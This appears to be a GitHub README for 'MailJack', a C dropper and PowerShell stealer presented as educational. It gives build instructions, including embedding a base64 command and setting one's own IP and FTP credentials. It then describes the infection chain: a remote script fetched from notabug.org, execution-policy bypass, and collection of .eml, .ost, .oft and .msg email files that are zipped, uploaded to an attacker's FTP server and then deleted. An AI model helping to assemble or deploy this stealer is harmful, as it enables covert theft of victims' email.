1d8 / MailJack

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

MailJack

MADE FOR EDUCATIONAL/RESEARCH PURPOSES


Explaining The Files

The test.ps1 file should include a link to the stealer.ps1 file, then you run b64encode.ps1, the output of b64encode.ps1 should be put inside the b642 variable in dropper.c. Make sure to add powershell -encodedCommand before the base64 encoded data in the b642 variable to ensure the base64 is decoded & executed.

Make sure to change the IP address & username & password used in stealer.ps1 to suit your own needs.

Post Execution

After execution of dropper.exe, we find that the infamous "hello world" phrase pops up in the command line & we see 2 new powershell scripts loaded onto the Desktop: file.ps1 & stealer.ps1:

Our process tree:

So after execution of the dropper, Powershell is executed 4 times along with cmd.exe being executed 5 times.

We also see ping.exe being used twice which is used in order have the program sleep for a few seconds, in this case for about 10 & 5 seconds since it is asking for localhost to be pinged 10 & 5 times & each ping would take about a second, maybe even less:

The first instance of powershell is simply used to print "hello world":

The second instance of powershell is used to execute file.ps1:

Inside file.ps1 is just random hex, the same goes for stealer.ps1, the two files are likely modified after being executed:

Viewing the command in the Process Tree for file.ps1, we get a command that is base64 encoded twice. The 1st line is the double base64 encoded command while the 4th line is only base64 encoded once:

Powershell.exe -ExecutionPolicy bypass is used to modify the execution policy of Powershell scripts which allows an attacker to execute their own scripts.

And the --encodedCommand flag simply decodes the base64 & executes it.

Decoding the 2nd base64, we see that file.ps1 retrieves the stealer.ps1 file:

Setting the ProgressPreference to SilentlyContinue simply suppresses the output from the web request, usually web requests with powershell has a loading bar which shows the progress, example:

For those who are unaware, notabug.org is a lot like Github, it allows you to host code and here, it hosts the primary malware:

The first five lines of code:

  1. Sets a user variable to the current user's username
  2. Sets a dir variable to the user's temp directory + the user's username (%TMP%\Username)
  3. Creates a directory using the dir variable & suppresses the output (the directory would be %TMP%\Username)
  4. Searches for files with the .eml, .ost, .oft, or .msg extension recursively & adds the file to the folder created in line 3
  5. Creates a zip file of the folder created in line 3, this folder should now contain files with common email extensions

Lines 6-17 simply send the zip file to a remote FTP server

Lines 18-19 remove the zip file as well as the folder created in the user's %TMP% directory

Now back to Process Tree since we have one remaining powershell.exe instance to look over:

All this last instance of powershell does is finally execute stealer.ps1

Summary

  1. Dropper.exe will drop file.ps1
  2. File.ps1 includes a double base64 encoded command which will grab stealer.ps1
  3. Stealer.ps1 will steal files with common email extensions & send them to a remote FTP server

About


Languages

Language:C 66.4%Language:PowerShell 33.6%